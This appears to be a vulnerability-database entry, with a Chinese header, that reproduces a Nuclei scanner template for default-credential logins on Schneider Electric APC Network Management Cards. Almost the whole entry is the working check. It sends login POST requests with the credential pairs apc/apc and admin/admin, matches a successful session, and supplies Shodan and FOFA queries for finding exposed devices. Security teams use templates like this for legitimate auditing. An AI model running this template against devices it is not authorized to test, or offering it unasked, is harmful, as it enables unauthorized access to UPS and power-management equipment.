漏洞描述
Schneider Electric APC Network Management Cards with default credentials.
apc-nmc-default-login: Schneider Electric APC NMC - Default Login
PoC代码[已公开]
id: apc-nmc-default-login
info:
name: Schneider Electric APC NMC - Default Login
author: x-stp
severity: high
description: |
Schneider Electric APC Network Management Cards with default credentials.
reference:
- https://www.apc.com/us/en/faqs/FA156047/
classification:
cwe-id: CWE-522
cvss-score: 8.6
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cpe: cpe:2.3:o:schneider-electric:network_management_card_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
shodan-query: title:"APC | Log On"
fofa-query: title="APC | Log On"
product: apc-network-management-card
vendor: schneider-electric
tags: apc,default-login,iot,ups,vuln
http:
- raw:
- |
POST /Forms/login1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login_username={{username}}&login_password={{password}}&prefLanguage=00000000&submit=Log+On
attack: pitchfork
payloads:
username:
- apc
- admin
password:
- apc
- admin
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- "(?i)Location: .*/NMC/"
- type: regex
part: header
regex:
- "(?i)Set-Cookie: APC[^=]+=[^;]+"
- type: status
status:
- 303
# digest: 4a0a0047304502210085aaf1ae1957fdae33cdc93620586078139eb1c7c211da70a3ea7054787c517702201bf6dc15b67a36399b346ce69298334e05becce166e2fd6d4591f52a99aa48f6:922c64590222798bb761d5b6d8e72950